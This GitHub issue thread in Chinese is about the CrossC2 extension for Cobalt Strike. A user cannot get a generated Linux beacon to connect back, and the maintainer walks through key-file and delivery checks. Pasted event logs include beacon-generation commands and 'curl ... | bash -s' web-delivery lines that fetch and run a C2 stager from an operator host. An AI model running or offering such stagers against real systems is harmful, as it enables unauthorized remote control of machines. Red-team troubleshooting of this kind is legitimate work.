### ISSUE TITLE
cs4.1能够正常生成payload，但是主机仍然无法上线

### ISSUE THREAD

**Issue by chenchenhen6** [gloxec/CrossC2#59]
为什么我的cs4.1可以正常生成payload，但是主机就是无法上线，执行了payload下载的空文件
<img width="491" alt="图片" src="https://user-images.githubusercontent.com/35289748/104102794-8b193d00-52d9-11eb-8a34-faea62af1b88.png">
<img width="329" alt="图片" src="https://user-images.githubusercontent.com/35289748/104102821-b3a13700-52d9-11eb-968d-afd83c54e13d.png">
<img width="912" alt="图片" src="https://user-images.githubusercontent.com/35289748/104102887-2e6a5200-52da-11eb-8d85-9166bd75d842.png">

**Comment by chenchenhen6** [comment]
下载的是4.1分支的

**Comment by gloxec** [comment]
请查看客户端event界面的输出信息，查看是否有正确生成文件，以及输出提示的文件大小字节数。以确定是否是genCrossC2路径配置问题，key问题，或者重复生成时端口没有更改重复使用。
参照 https://github.com/gloxec/CrossC2/issues/33#issuecomment-687054779

event输出信息以下为例可以看到对应执行的生成命令(第一行)，生成文件的大小字节数(第二行)
```
05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] :    Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ http://172.16.251.1:55413/iqEBVKwHoZ
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ http://172.16.251.1:55413/a
05/01 23:31:07 *** CrossC2 MacOS x64:   curl -A o -o- -L http://172.16.251.1:55413/a | bash -s
```

**Comment by chenchenhen6** [comment]
控制台输出
01/12 16:48:06 *** /Users/soulme/tools/burp插件/cs/CrossC2-master/src/genCrossC2.MacOS vpsip 8888 ./.cobaltstrike.beacon_keys null Linux x64 /tmp/CrossC2-test
01/12 16:48:09 *** genCrossC2 beacon -> *[success] :	Packed 1553560 byte.
01/12 16:48:09 *** ubuntu hosted CrossC2 beacon Linux x64 @ http://vpsip:55413/GDzZsFkGRJ
01/12 16:48:09 *** ubuntu hosted Script Unix Web Delivery (curl) @ http://vpsip:55413/c
01/12 16:48:09 *** CrossC2 Linux x64:   curl -A o -o- -L http://vpsip:55413/c | bash -s
目前能够正常生成，但是本地生成会报错
[./.cobaltstrike.beacon_keys] : read keys error
generate beacon keys error
*[error] : read key error
控制台生成的payload仍然还是无法上线linux主机，/.cobaltstrike.beacon_keys文件是从vps上下载到src目录， 试过好几次都是这样，求大佬解答

**Comment by gloxec** [comment]
> ... 本地生成会报错
> [./.cobaltstrike.beacon_keys] : read keys error
> generate beacon keys error
> *[error] : read key error

这个报错是key文件不对或者key文件没有找到的问题，检查下传入的路径是否正确



> 01/12 16:48:09 *** genCrossC2 beacon -> *[success] : Packed 1553560 byte.
> 01/12 16:48:09 *** ubuntu hosted CrossC2 beacon Linux x64 @ http://vpsip:55413/GDzZsFkGRJ
> 01/12 16:48:09 *** ubuntu hosted Script Unix Web Delivery (curl) @ http://vpsip:55413/c
> 控制台生成的payload仍然还是无法上线linux主机

这里是无法上线有无具体信息： 
1.  curl下载执行 http://vpsip:55413/c 时文件是否为空，ps aux是否可以查看到对应进程在运行?
2. 手动下载执行 http://vpsip:55413/GDzZsFkGRJ 时是否正常?
3. CrossC2 进程在运行时，vps teamserver进程有无报错输出?
4. CrossC2 进程在运行时，cs客户端weblog界面有无信息输出?
